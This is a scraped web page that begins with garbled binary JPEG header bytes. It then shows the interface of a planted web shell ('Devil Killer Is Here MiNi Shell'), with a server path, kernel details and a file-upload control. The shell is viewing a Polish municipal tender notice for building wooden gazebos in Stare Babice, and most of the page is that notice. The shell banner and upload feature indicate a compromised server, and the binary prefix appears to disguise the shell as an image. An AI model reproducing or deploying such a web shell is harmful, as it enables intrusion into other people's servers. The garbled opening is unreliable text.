JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210805/0013855901-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00138559 z dnia 2021-08-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Dostawa i montaż wiat w gminie Stare Babice </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stare Babice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271855</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stare Babice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 730 80 37</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@stare-babice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://starebabice.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż wiat w gminie Stare Babice </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-51ab2c6c-f5cf-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00138559</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005405/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Doposażenie placów zabaw i terenów rekreacyjnych na terenie gminy Stare Babice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://starebabice.bip.net.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/stare_babice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej lub postaci elektronicznej za<br/>pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/stare_babice<br/>2. W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie dokumentów, oświadczeń, wniosków, zawiadomień, zapytań oraz<br/>przekazywanie informacji odbywa się za pośrednictwem Platformy zakupowej i formularza „Wyślij<br/>wiadomość do zamawiającego” dostępnego na stronie https://platformazakupowa.pl/pn/stare_babice<br/>danego postępowania.<br/>3. Osobami uprawnionymi do kontaktu (w godzinach pracy Zamawiającego) z Wykonawcami są:<br/>1) w kwestiach formalno-prawnych i merytorycznych:<br/>a) Jacek Kłopotowski, Naczelnik Wydziału Inwestycji, Zamówień Publicznych i Funduszy<br/>Zewnętrznych, tel.22-730-80-34, e-mail: zamowienia.publiczne@stare-babice.pl;<br/>b) Paulina Mateusiak – Główny Specjalista ds. zamówień publicznych, tel. 22-730-80-37,<br/>e-mail: zamowienia.publiczne@stare-babice.pl;<br/>c) Marta Kotlińska, Inspektor ds. zamówień publicznych, tel. 22-730-80-37, e-mail:<br/>zamowienia.publiczne@stare-babice.pl;<br/>2) w przypadku pytań technicznych związanych z funkcjonowaniem platformy należy kontaktować się z<br/>Centrum Wsparcia Klienta Platformy: nr tel. (22) 101 02 02, adres e-mail: cwk@platformazakupowa.pl<br/>4. Zamawiający będzie przekazywał Wykonawcom informacje w formie elektronicznej lub postaci<br/>elektronicznej za pośrednictwem Platformy zakupowej. Kierowane do wszystkich Wykonawców<br/>informacje dotyczące odpowiedzi na zapytania, zmiany specyfikacji, w tym zmiany terminu składania i<br/>otwarcia ofert, Zamawiający będzie zamieszczał na Platformie w sekcji „Komunikaty”. Korespondencję,<br/>której adresatem jest konkretny Wykonawca, Zamawiający będzie przekazywał temu Wykonawcy w<br/>formie elektronicznej lub w postaci elektronicznej za pośrednictwem Platformy zakupowej. Pozostałe<br/>informację są zawarte w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązki dotyczące RODO zawarte w Rozdziale XXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIZiF.271.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 112178 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	część 1 zamówienia – Dostawa i montaż wiaty w miejscowości Zielonki-Parcela;<br/>2.	Przedmiot zamówienia dla części 1 – dostawa i montaż wiaty w miejscowości Zielonki-Parcela obejmuje wykonanie m.in. następujących czynności oraz prac:<br/>1)	dostawa i montaż altany o parametrach:<br/>a)	powierzchnia zabudowy – 35m²,<br/>b)	powierzchnia użytkowa – 35m²,<br/>c)	długość altany – 7m,<br/>d)	szerokość altany – 5m,<br/>e)	wysokość całkowita altany – 3,2m,<br/>f)	wysokość ścian bocznych – 2,05m,<br/>g)	ściany boczne w połowie zabudowane, zakończone ozdobnym ażurowym wykończeniem z dwóch krzyżujących się belek o przekrojach – 5cm x 5cm, <br/>h)	wysokość w kalenicy – 2,9m,<br/>i)	dach czterospadowy,<br/>j)	kąt nachylenia dachu – ok.30 stopni,<br/>k)	słupy nośne – 12cm x 12cm,<br/>l)	dwa wejścia umiejscowione po przeciwległych stronach na środku krótszych ścian;<br/>m)	materiał:<br/>	drewno sosnowe suszone,<br/>	podwójny impregnat Drewnochron w kolorze białym,<br/>	pokrycie dachowe gont bitumiczny w kolorze czarnym,<br/>	orynnowanie w kolorze czarnym;<br/>2)	pozostałe prace:<br/>a)	wykonanie fundamentów pod słupy,<br/>b)	wykonanie podłoża z kostki betonowej o parametrach:<br/>	kostka brukowa betonowa bezfazowa10 x 20cm, gr. 6cm – kolor szary,<br/>	powierzchnia zabudowy – 63m²,<br/>	długość – 9m,<br/>	szerokość – 7m, <br/>	obrzeża betonowe – 8 x 30cm,<br/>	podsypka cementowo piaskowa – 5cm,<br/>	podbudowa z kruszywa z kamienia łamanego o uziarnieniu ciągłym 0 – 31,5mm – 10 cm, <br/>	warstwa odsączająca z piasku/pospółki – 10cm;<br/>3)	przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej zawierającej co najmniej szkice, atesty, certyfikaty i dopuszczenia do stosowania w budownictwie dla materiałów użytych do wykonania przedmiotu umowy,<br/>4)	uporządkowanie terenu i przywrócenie do stanu pierwotnego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20378 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34928210-3 - Wiaty drewniane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45211320-8 - Roboty budowlane w zakresie altan</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużona rękojmia za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	część 2 zamówienia – Dostawa i montaż wiaty na terenie działki gminnej nr 252/30 położonej <br/>w Koczargach Starych;<br/>3.	Przedmiot zamówienia dla części 2 – Dostawa i montaż wiaty na terenie działki gminnej nr 252/30 położonej w Koczargach Starych obejmuje wykonanie m.in. następujących czynności oraz prac:<br/>1)	dostawa i montaż wiaty o parametrach:<br/>a)	powierzchnia zabudowy – 50m²,<br/>b)	powierzchnia użytkowa – 50m²,<br/>c)	długość wiaty – 10m,<br/>d)	szerokość wiaty – 5m,<br/>e)	wysokość całkowita wiaty – 3,2m,<br/>f)	wysokość ścian bocznych – 2,05m,<br/>g)	ściany boczne w połowie zabudowane, zakończone ozdobnym ażurowym wykończeniem z dwóch krzyżujących się belek o przekrojach – 5cm x 5cm, <br/>h)	wysokość w kalenicy – 2,9m,<br/>i)	dach czterospadowy,<br/>j)	kąt nachylenia dachu – ok.30 stopni,<br/>k)	słupy nośne – 12cm x 12cm,<br/>l)	dwa wejścia umiejscowione po przeciwległych stronach na środku krótszych ścian,<br/>m)	materiał:<br/>	drewno sosnowe suszone,<br/>	podwójny impregnat Drewnochron w kolorze białym,<br/>	pokrycie dachowe gont bitumiczny w kolorze czarnym,<br/>	orynnowanie w kolorze czarnym;<br/>2)	pozostałe prace:<br/>a)	wykonanie fundamentów pod słupy;<br/>b)	wykonanie podłoża z kostki betonowej o parametrach:<br/>	kostka brukowa betonowa bezfazowa10 x 20cm, gr. 6cm – kolor szary,<br/>	powierzchnia zabudowy – 84m²,<br/>	długość – 12m,<br/>	szerokość – 7m,<br/>	obrzeża betonowe – 8 x 30cm,<br/>	podsypka cementowo piaskowa – 5cm,<br/>	podbudowa z kruszywa z kamienia łamanego o uziarnieniu ciągłym 0 – 31,5mm – 10 cm, <br/>	warstwa osaczająca z piasku/pospółki – 10cm;<br/>3)	przekazanie dokumentacji powykonawczej w szczególności szkiców wykonanych obiektów oraz dokumentów na wbudowane materiały dopuszczających do ich stosowania w budownictwie;<br/>4)	uporządkowanie terenu i przywrócenie do stanu pierwotnego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24600 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34928210-3 - Wiaty drewniane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45211320-8 - Roboty budowlane w zakresie altan</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużony okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3)	część 3 zamówienia – Dostawa i montaż wiaty na terenie pola rekreacyjno-wypoczynkowego w Starych Babicach; Część 3 zamówienia jest zamówieniem z prawem opcji.<br/>5.	Przedmiot zamówienia dla części 3 – dostawa i montaż wiaty na terenie pola rekreacyjno-wypoczynkowego w Starych obejmuje:<br/>1)	zamówienie gwarantowane – zamówienie, które zostanie uruchomione przez Zamawiającego obligatoryjnie w ramach niniejszej umowy obejmuje budowę jednej wiaty grillowej składającej się z dwóch zestawów stołów z ławami pomiędzy którymi umieszczono stanowisko do ustawienia przenośnego grilla. - całość zadaszona rys A-04, w szczególności:<br/>a)	fundament: <br/>	konstrukcje drewniane wiaty mocowane do gruntu za pomocą - 4 fundamentów,<br/>	pojedynczy fundament betonowy, w postaci ławy długości 140 cm, szerokości 50 cm<br/>i wysokości min. 100 cm,<br/>	fundament bezszalunkowy, wylewany na miejscu,<br/>	beton klasy nie niższej niż C 16/20,<br/>	górna powierzchnia betonu poniżej poziomu zlicowana z powierzchnią gruntu, niezbrojony;<br/>b)	konstrukcja drewniana:<br/>	elementy konstrukcyjne wykonane z dłużyc z drewna iglastego,<br/>	wszystkie elementy heblowane i zabezpieczone, bejcą o naturalnym kolorze,<br/>	elementy łączone ze sobą za pomocą śrub i bezgłówkowych gwoździ, ewentualnie kleju,<br/>	wszystkie otwory po śrubach należy flekować kołkami z identycznego drewna jak materiał konstrukcyjny,<br/>	gwoździe wbijać tak aby nie były widoczne;<br/>c)	okucia stalowe<br/>	okucia stalowe zastosowane jedynie do montażu słupów do fundamentów,<br/>	elementy wykonane z blach ze stali S235JR, grubości 5mm. elementy łączone spawaniem, spoiny pachwinowe. Elektrody EA1.46. Spawy szlifowane;<br/>	wszystkie elementy stalowe cynkowane ogniowo powłoką gr. 80μn i malowane farbami dedykowanymi do elementów ocynkowanych na kolor RAL 7021 (grafitowy);<br/>d)	do budowy pagody należy zastosować następujące elementy łączące:<br/>	kotwy do betonu M12, L=120mm,<br/>	śruby M12, L=120mm + nakrętka M12 + podkładka zw.13/24 + podkładka pow. 13/14, <br/>	gwoździe typu SFS WT-T, 6,5 x 130 mm,<br/>	wkręty do drewna mosiężne M5,5, L=75mm;<br/>e)	budowa dachu:<br/>	dach kryty gontem drewnianym mocowanym gwoździami do łat drewnianych,<br/>	łaty wykonane z kantówki 5,0 x 3,5 cm, świerkowej lub sosnowej,<br/>	ze względu na to, że łaty będą widoczne nie mogą być fabrycznie zabezpieczone (nie mogą być zielone) muszą być bejcowane identycznie jak reszta konstrukcji drewnianej,<br/>	łaty w rozstawie co 10 cm, mocowanie do krokwi za pomocą gwoździ lub wkrętów do drewna (niewykazanych w zestawieniu łączników),<br/>	gont z drewna jodłowego lub modrzewiowego, łupany,<br/>	długość pojedynczej deszczułki ok. 30cm, szerokość ok. 10 cm, grubość 4 – 12 mm,<br/>	gonty mocowane na zakład 10 cm do łat za pomocą gwoździ mosiężnych, <br/>	kalenice wykonane również z gontów;<br/>f)	okap z kominem<br/>	okap w kształcie ściętego stożka o średnicy u podstawy 120 cm zwężającego się do 30 cm,<br/>	komin w kształcie rury średnicy 30 cm, wysokości 70 cm, zakończony daszkiem stożkowym wspartym na wspornikach,<br/>	przejście przez dach uszczelnione kryzą,<br/>	elementy wykonane z blachy stalowej, ocynkowanej gr. min. 0,8 mm. łączenie lutowaniem w sposób szczelny;<br/>g)	obsługa geodezyjna i uporządkowanie terenu i przywrócenie do stanu pierwotnego;<br/>h)	przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej zawierającej co najmniej:<br/>	inwentaryzację geodezyjną powykonawczą (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił potwierdzenie złożenia zamówienia pliku KCD do modyfikacji wraz z kopią operatu geodezyjnego)<br/>	atesty, certyfikaty i dopuszczenia do stosowania w budownictwie dla materiałów użytych do wykonania przedmiotu umowy.<br/>2)	zamówienie opcjonalne – zamówienie, które może zostać uruchomione przez Zamawiającego w miarę posiadanych środków obejmuje budowę stanowiska do rozpalania ogniska w postaci utwardzonego placu i siedzisk z okorowanych pni drzewa rys A-03, w szczególności:<br/>a)	stanowisko okrągłe (śr. 200 cm), ograniczone listwą metalową z nawierzchnią wykonaną z otoczaków,<br/>b)	pod stanowisko należy wykonać podlewkę z chudego betonu grubości 10 cm,<br/>c)	dla ukształtowania stanowiska należy wykonać obręcz z bednarki stalowej, ocynkowanej,<br/>d)	wnętrze obręczy należy wypełnić betonem. Beton powinien być zlicowany z górną krawędzią obręczy (dla prawidłowego odprowadzania wody),<br/>e)	w beton należy włożyć kamienie – otoczaki tak aby ich górne płaszczyzny wystawały,<br/>f)	obsługa geodezyjna i uporządkowanie terenu i przywrócenie do stanu pierwotnego,<br/>g)	przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej zawierającej co najmniej:<br/>	inwentaryzację geodezyjną powykonawczą (Zamawiający dopuszcza, aby w dniu odbioru Wykonawca przedstawił potwierdzenie złożenia zamówienia pliku KCD do modyfikacji wraz z kopią operatu geodezyjnego)<br/>	atesty, certyfikaty i dopuszczenia do stosowania w budownictwie dla materiałów użytych do wykonania przedmiotu umowy.<br/>Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest jednostronnym uprawnieniem, a nie zobowiązaniem Zamawiającego. Zamawiający może nie skorzystać z prawa opcji, skorzystać z niego w mniejszym zakresie aniżeli określony powyżej, w szczególności w przypadku nie posiadania środków finansowych na ten cel a Wykonawcy nie przysługują z tego tytułu żadne roszczenia w stosunku do Zamawiającego, co akceptuje poprzez podpisanie niniejszej umowy.<br/>Zamówienie opcjonalne zostanie udzielone łącznie z zamówieniem gwarantowanym.<br/>W celu skorzystania z prawa opcji Zamawiający przekaże Wykonawcy oświadczenie w formie pisemnej.<br/>W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawca jest zobowiązany do jego realizacji, na warunkach określonych w niniejszym postępowaniu. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 67200 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34928210-3 - Wiaty drewniane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45211320-8 - Roboty budowlane w zakresie altan</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 2)	zamówienie opcjonalne – zamówienie, które może zostać uruchomione przez Zamawiającego w miarę posiadanych środków obejmuje budowę stanowiska do rozpalania ogniska w postaci utwardzonego placu i siedzisk z okorowanych pni drzewa rys A-03, w szczególności:<br/>a)	stanowisko okrągłe (śr. 200 cm), ograniczone listwą metalową z nawierzchnią wykonaną z 